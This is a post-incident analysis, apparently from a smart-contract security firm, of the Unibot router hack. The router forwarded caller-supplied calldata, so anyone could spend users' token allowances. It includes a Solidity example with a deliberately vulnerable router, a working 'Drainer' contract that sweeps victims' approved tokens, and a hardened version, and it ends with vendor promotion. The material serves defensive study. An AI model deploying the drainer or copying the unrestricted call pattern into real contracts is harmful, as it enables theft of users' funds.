Unibot Hack Analysis
Overview:
On 31 October 2023, Unibot was hacked through a call injection vulnerability in its router contract, leading to a total loss of about $500k in user tokens.
Smart Contract Hack Overview:
Decoding the Smart Contract Vulnerability:
The root cause is a call injection: the router's 0xb2bd16ab() method forwarded caller-supplied calldata to a caller-supplied target address without restricting either. Because the call is made from the router's own context, anyone could have the router invoke transferFrom() on a token contract and spend the allowances that users had granted to the Unibot router.
1. Users had granted the Unibot router large (often unlimited) ERC-20 allowances, far above the balances they actually held. The attacker did not need to obtain these allowances; the router's unrestricted call method let anyone spend them.
2. The exploit contract iterates over a list of such victim addresses (the array labelled ‘cd’ in the decompiled bytecode).
3. For each address it reads the token balance with ‘balanceOf()’ and the allowance granted to the Unibot router with ‘allowance()’ (the decompiler labels the token contract ‘stor1’).
4. When the allowance exceeds the balance, the contract calls back into itself, passing along the victim address, the token contract, the balance and the allowance.
5. That self-call builds a ‘transferFrom(victim, attacker, amount)’ payload and feeds it to the router's 0xb2bd16ab() method. The router executes it, and since the router is the approved spender, the token contract accepts the transfer.
6. The crucial point of the self-callback:
– It spends the victim's allowance to the router, not any funds held by the router itself.
– The amount moved is capped by the victim's balance, because transferFrom() cannot exceed it. Comparing balance against allowance simply tells the attacker how much each victim can be drained for.
7. Consequently, the tokens are pulled from the victims' wallets into the attacker's account.
8. Repeating this across every address with an outstanding allowance drains a large total amount.
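The pattern described above, reduced to its essentials, as an added illustration. This is not Unibot's code and not the attacker's: the router's real method is known here only by its selector 0xb2bd16ab(), so the name ‘execute’ below, the contract names and the ‘Drainer’ logic are assumptions. It generalizes the analysis slightly by taking min(balance, allowance) for every victim instead of acting only when the allowance exceeds the balance, and it places a hardened router beside the vulnerable one.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example, not the Unibot router or exploit contract. Names are assumed.

interface IERC20 {
    function balanceOf(address owner) external view returns (uint256);
    function allowance(address owner, address spender) external view returns (uint256);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

/// Vulnerable pattern: forwards caller-supplied calldata to a caller-supplied target.
/// Every ERC-20 allowance users granted to this contract becomes spendable by anyone,
/// because the token sees the router (the approved spender) as msg.sender.
contract VulnerableRouter {
    function execute(address target, bytes calldata data) external returns (bytes memory) {
        (bool ok, bytes memory ret) = target.call(data); // call injection
        require(ok, "call failed");
        return ret;
    }
}

/// Attacker contract: the drain loop from the analysis above.
contract Drainer {
    VulnerableRouter public immutable router;
    IERC20 public immutable token;
    address public immutable owner;

    constructor(address router_, address token_) {
        router = VulnerableRouter(router_);
        token = IERC20(token_);
        owner = msg.sender;
    }

    /// `victims` plays the role of the `cd` array: addresses that approved the router.
    function drain(address[] calldata victims) external {
        require(msg.sender == owner, "not owner");
        for (uint256 i = 0; i < victims.length; i++) {
            uint256 bal = token.balanceOf(victims[i]);
            uint256 allow = token.allowance(victims[i], address(router));
            // transferFrom can move at most min(balance, allowance)
            uint256 amount = bal < allow ? bal : allow;
            if (amount == 0) continue;
            // The router makes the call, so the token charges the victim's allowance to it.
            router.execute(
                address(token),
                abi.encodeWithSelector(IERC20.transferFrom.selector, victims[i], owner, amount)
            );
        }
    }
}

/// Hardened pattern: fixed set of call targets, and token contracts that users
/// approve to this router are never valid targets for user-supplied calldata.
contract HardenedRouter {
    mapping(address => bool) public allowedTarget;

    constructor(address[] memory targets) {
        for (uint256 i = 0; i < targets.length; i++) allowedTarget[targets[i]] = true;
    }

    function execute(address target, bytes calldata data) external returns (bytes memory) {
        require(allowedTarget[target], "target not whitelisted");
        (bool ok, bytes memory ret) = target.call(data);
        require(ok, "call failed");
        return ret;
    }
}
```

The whitelist stops the transferFrom() injection only if no approved token contract is on it. The stronger design is to never pass user calldata to a token at all: the router should pull tokens only from msg.sender, for amounts it computes itself, and then talk to the DEX with calldata it builds.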

Mitigation and Best Practices:
- Users who approved the affected router (0x126c9F) need to revoke that allowance. Review other long-lived allowances as well, and approve only the amount a trade needs instead of an unlimited amount.
- Always validate your code with comprehensive test cases that cover the possible business logic, including calls made on behalf of users.
- To prevent such vulnerabilities, have experienced smart contract auditors review the contracts for logical issues such as unrestricted external calls. We at CredShields provide smart contract security and end-to-end security of web applications and externally exposed networks. Schedule a call at https://credshields.com/
- Scan your Solidity contracts against the latest common security vulnerabilities with 130+ detections at SolidityScan.

Conclusion:
SolidityScan is an advanced smart contract scanning tool that discovers vulnerabilities and reduces risk in code. Request a security audit with us, and we will help you secure your smart contracts. Sign up for a free trial at https://solidityscan.com/signup
Follow us on our Social Media for Web3 security-related updates.
SolidityScan — LinkedIn | Twitter | Telegram | Discord